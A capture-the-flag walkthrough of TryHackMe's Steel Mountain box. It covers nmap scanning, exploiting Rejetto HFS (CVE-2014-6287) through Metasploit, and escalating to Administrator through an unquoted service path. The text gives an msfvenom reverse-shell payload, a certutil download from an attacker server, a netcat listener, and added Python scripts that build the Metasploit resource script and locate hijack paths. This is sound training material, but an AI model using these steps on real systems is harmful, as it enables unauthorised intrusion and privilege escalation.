Exploit a Rejetto HTTP File Server in Steel Mountain CTF from TryHackMe

Aug 4, 2023

This walkthrough covers the Steel Mountain CTF found on TryHackMe. This room is designed to evaluate our Windows OS enumeration skills. We will utilize Metasploit to gain an initial foothold, followed by PowerShell to enumerate the machine and escalate our privileges to Administrator.

Step 1: Nmap

Note: the host does not answer ICMP echo requests, so nmap's host discovery would mark it as down and skip it. The -Pn flag disables host discovery and scans the ports regardless; -p- covers all 65535 TCP ports.

nmap -Pn -p- -vvv
80/tcp    open  http          syn-ack ttl 125
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
5985/tcp  open  wsman         syn-ack ttl 125
8080/tcp  open  http-proxy    syn-ack ttl 125
47001/tcp open  winrm         syn-ack ttl 125
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49155/tcp open  unknown       syn-ack ttl 125
49156/tcp open  unknown       syn-ack ttl 125
49169/tcp open  unknown       syn-ack ttl 125
49170/tcp open  unknown       syn-ack ttl 125

From this scan, we can tell that there are two web servers, one of which will be our attack vector to get an initial foothold. Visiting the site on port 80 reveals nothing more than a static page for an employee of the month. Looking at the source code helps us identify a name, Bill Harper.

Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is a user panel to an HTTP File Server.

Looking at the source code narrows it down to Rejetto HTTP File Server (HFS). This is great news: HFS 2.3x before 2.3c is vulnerable to unauthenticated remote command execution (CVE-2014-6287, a null byte in the search parameter lets an attacker inject {.exec|...} template macros), and Metasploit has a module for it, exploit/windows/http/rejetto_hfs_exec.

Step 2: Metasploit

From here we search for the module (search rejetto), select it with use exploit/windows/http/rejetto_hfs_exec, and set the options: RHOSTS to the target, RPORT to 8080 (the module defaults to 80, which would hit the static employee-of-the-month page instead of HFS), and LHOST to our VPN interface address. The payload connects back to LHOST:LPORT, so the target must be able to reach us there.

After configuring the module and typing exploit, we get a Meterpreter session. Typing shell drops us into cmd.exe as bill, and the first flag is in C:\Users\bill\Desktop. Use type user.txt from that directory to view it.
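The two pieces of this step that are worth automating are the fingerprint (is this really HFS, and which version) and the module configuration. The following is an added example, not code from the walkthrough or from Metasploit: it parses a raw HTTP response, identifies HFS from the Server header (or the default page title as a fallback), decides whether the version is in the CVE-2014-6287 range, and writes the Metasploit resource script that sets the options discussed above. The sample response is constructed to look like what HFS 2.3 returns; the header and title strings, IP addresses and ports are assumptions.

```python
"""Fingerprint a Rejetto HFS instance from a raw HTTP response and build the
Metasploit resource script for the foothold.  Added example; the sample
response below is constructed, not captured from the CTF box."""
import re

# Constructed sample of an HFS 2.3 response to GET / (headers abbreviated).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Server: HFS 2.3\r\n"
    "\r\n"
    "<html><head><title>HFS /</title></head><body>...</body></html>"
)


def parse_response(raw):
    """Split a raw HTTP response into a lowercase-keyed header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return headers, body


def fingerprint_hfs(raw):
    """Return (is_hfs, version_or_None).

    The Server header is authoritative; the default page title is a weaker
    fallback for installs with a customised template that hides the header."""
    headers, body = parse_response(raw)
    match = re.match(r"HFS\s+([\w.]+)", headers.get("server", ""), re.I)
    if match:
        return True, match.group(1)
    if re.search(r"<title>\s*HFS\b", body, re.I):
        return True, None
    return False, None


def likely_vulnerable(version):
    """CVE-2014-6287 affects 2.3x before 2.3c (2.3, 2.3a, 2.3b)."""
    if version is None or not version.startswith("2.3"):
        return False
    suffix = version[3:]  # '', 'a', 'b', 'c', ...
    return suffix == "" or suffix < "c"


def build_msf_rc(rhost, rport, lhost, lport=4444):
    """Resource script for msfconsole -r; RPORT must be the HFS port (8080
    here), not the module default of 80."""
    return "\n".join([
        "use exploit/windows/http/rejetto_hfs_exec",
        f"set RHOSTS {rhost}",
        f"set RPORT {rport}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "run",
    ]) + "\n"


if __name__ == "__main__":
    is_hfs, version = fingerprint_hfs(SAMPLE_RESPONSE)
    print(f"HFS: {is_hfs}, version: {version}, vulnerable: {likely_vulnerable(version)}")
    if is_hfs and likely_vulnerable(version):
        # Assumed addresses: target 10.10.10.10, attacker VPN address 10.8.0.2.
        with open("hfs.rc", "w") as fh:
            fh.write(build_msf_rc("10.10.10.10", 8080, "10.8.0.2"))
        print("wrote hfs.rc; run: msfconsole -r hfs.rc")
```

The version check treats a bare "2.3" as vulnerable because the CVE covers every 2.3 build before 2.3c; if the header is absent and only the title matched, the function returns None for the version and you should confirm by hand before firing the module.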

Step 3: Privilege Escalation

To enumerate this machine, we will use winPEAS, which checks the usual Windows privilege-escalation vectors (service misconfigurations, weak file and directory permissions, stored credentials, and so on). Download the latest release from the PEASS-ng repository on GitHub (carlospolop/PEASS-ng).

Start a Python web server on the attacking machine, from the directory that contains the winPEAS binary:

python3 -m http.server 8000

Download winPEAS onto the victim's C:\Users\bill\Desktop directory using certutil.exe, giving it the URL of our server and an output filename. certutil is a signed Microsoft binary that is present on every Windows host, which is why it is a convenient downloader when all we have is a shell.

certutil.exe -urlcache -f winPEASany_ofs.exe

Run it by typing winPEASany_ofs.exe and read through the services section of the output.

winPEAS flags an interesting service called AdvancedSystemCareService9 whose binary path is unquoted and contains spaces. When the Service Control Manager starts such a service, Windows tries each space-delimited prefix of the path as a program name before it reaches the real binary. The path component after IObit\ begins with "Advanced" followed by a space, so Windows will look for C:\Program Files (x86)\IObit\Advanced.exe first; if we can place a reverse shell there, it runs with the service's privileges. Two conditions make this exploitable: our user can stop and start the service, and the IObit directory is writable by us. winPEAS reports both, but confirm the second with icacls on the directory before relying on it.

Let's fire up msfvenom and generate a payload.

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1337 -f exe -o Advanced.exe

Start up a Python server again and transfer the payload over using certutil, as before.

Move it to "C:\Program Files (x86)\IObit\", and be sure to put the file path in quotes due to the space.

Now we want to stop the AdvancedSystemCareService9 service with sc stop, so that the next start goes through the SCM's path resolution and picks up our binary.

Start a netcat listener to catch the reverse shell.

nc -lvnp 1337

Start the AdvancedSystemCareService9 service back up with sc start. The SCM will complain that the service did not respond to the start request in time, because our payload is a plain reverse shell rather than a real service, but by then the connection has already come back to the listener. The SCM may terminate the unresponsive process once its start timeout expires, so grab the flag promptly or migrate to another process.
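Steps 3 and 4 above are a manual version of the unquoted-service-path check that winPEAS automates. The following is an added example, not code from the walkthrough or from winPEAS: given a service listing, it computes the files Windows would try before the real binary, picks the first one that sits in a directory we can write to, and emits the sc commands both to trigger the hijack and to fix it afterwards. The service list and the set of writable directories are constructed for the demo; the IObit entry follows the path this box abuses, and the other two entries are assumptions added to show a safe path and a properly quoted one.

```python
"""Unquoted service path analysis.  Added example; the service listing and
the writable-directory set are constructed, not taken from the CTF box."""
import ntpath  # Windows path handling that works on any host

# Constructed sample: (name, PathName, StartName) as a service listing reports them.
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
     "LocalSystem"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "LocalSystem"),
    ("QuotedSvc", r'"C:\Program Files\Vendor Tool\svc.exe" -run', "LocalSystem"),
]
# Assumed result of running icacls on candidate directories (constructed).
WRITABLE_DIRS = [r"C:\Program Files (x86)\IObit", r"C:\Users\bill\Desktop"]


def hijack_candidates(path):
    """Files CreateProcess tries, in order, for an unquoted path containing
    spaces: each prefix up to a space, with .exe appended.  A quoted path or
    one without spaces has no hijack points; the first prefix that already
    ends in .exe is the real binary, so enumeration stops there."""
    p = path.strip()
    if p.startswith('"') or " " not in p:
        return []
    candidates = []
    for i, ch in enumerate(p):
        if ch != " ":
            continue
        prefix = p[:i]
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def _norm(directory):
    return directory.lower().rstrip("\\")


def plan_hijack(path, writable_dirs):
    """First candidate whose parent directory we can write to, or None."""
    writable = {_norm(d) for d in writable_dirs}
    for candidate in hijack_candidates(path):
        if _norm(ntpath.dirname(candidate)) in writable:
            return candidate
    return None


def audit(services, writable_dirs):
    """Return (service, drop path, account) for every exploitable service."""
    findings = []
    for name, path, account in services:
        target = plan_hijack(path, writable_dirs)
        if target:
            findings.append((name, target, account))
    return findings


def trigger_commands(name):
    """Restart the service so the SCM resolves the path again."""
    return [f"sc stop {name}", f"sc start {name}"]


def fix_command(name, exe_path):
    """Quote the stored path.  sc strips the outer quotes, so the inner
    escaped quotes are what ends up in the registry."""
    return f'sc config {name} binPath= "\\"{exe_path.strip()}\\""'


if __name__ == "__main__":
    for svc, target, account in audit(SAMPLE_SERVICES, WRITABLE_DIRS):
        print(f"[+] {svc} runs as {account}; drop payload at: {target}")
        print("    trigger: " + " && ".join(trigger_commands(svc)))
    print("fix: " + fix_command(SAMPLE_SERVICES[0][0], SAMPLE_SERVICES[0][1]))
```

Note that C:\Program.exe and C:\Program Files.exe also appear as candidates; they are usually not writable by a standard user, which is why the check against actual directory permissions matters more than the list of prefixes itself.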

Step 4: Root

Pwned! From here we can grab the last flag found in C:\Users\Administrator\Desktop.

I hope you enjoyed this walkthrough of the Steel Mountain CTF found on TryHackMe. Happy Hacking.

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!